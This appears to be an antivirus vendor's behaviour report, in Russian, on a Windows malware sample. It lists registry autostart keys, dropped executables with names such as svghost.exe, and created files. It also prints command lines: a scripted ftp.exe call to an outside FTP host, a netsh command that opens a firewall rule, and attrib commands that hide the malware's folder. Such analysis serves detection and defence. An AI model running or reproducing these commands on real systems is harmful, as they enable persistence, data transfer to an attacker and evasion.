Техническая информация
Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'run' = 'c:\Users\Public\Recorded TV\system\run.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'systemBios' = 'c:\Users\Public\Recorded TV\system\system.exe'
Вредоносные функции:
Создает и запускает на исполнение:
- %TEMP%\system.exe
- %TEMP%\tastmanager.exe
- %TEMP%\mp3gain-win-full-1_2_5.exe
- %TEMP%\taskmanager.exe
- %TEMP%\svghost.exe
Запускает на исполнение:
- <SYSTEM32>\ftp.exe -i -n -s:c:\Users\Public\ftpcmd1.dat ftp.johnjohn.sexyi.am
- <SYSTEM32>\hostname.exe
- <SYSTEM32>\netsh.exe advfirewall firewall set rule name="File Transfer Program" new enable=yes action=allow profile=any
- <SYSTEM32>\attrib.exe /D /S +H "C:\Users\Public\Recorded TV\system"
- <SYSTEM32>\cmd.exe /c ""%TEMP%\3.tmp\sken.bat" "
- <SYSTEM32>\cmd.exe /c ""%TEMP%\7.tmp\tastmanager.bat" "
- <SYSTEM32>\attrib.exe +h "C:\Users\Public\Recorded TV\system"
Изменения в файловой системе:
Создает следующие файлы:
- %TEMP%\nsh6.tmp\modern-wizard.bmp
- %TEMP%\7.tmp\tastmanager.bat
- %TEMP%\nsh6.tmp\ioSpecial.ini
- C:\Users\Public\crnjeufu-2012-10-11
- C:\Users\Public\ftpcmd1.dat
- %TEMP%\nsh6.tmp\InstallOptions.dll
- %TEMP%\nsr5.tmp
- %TEMP%\mp3gain-win-full-1_2_5.exe
- %TEMP%\svghost.exe
- %TEMP%\taskmanager.exe
- %TEMP%\tastmanager.exe
- %TEMP%\3.tmp\sken.bat
- %TEMP%\system.exe
Удаляет следующие файлы:
- C:\Users\Public\ftpcmd1.dat
Сетевая активность:
Подключается к:
- 'localhost':1039
- 'localhost':1037
- 'ft#.###njohn.sexyi.am':21
UDP:
- DNS ASK ft#.###njohn.sexyi.am
Другое:
Ищет следующие окна:
- ClassName: 'Shell_TrayWnd' WindowName: ''
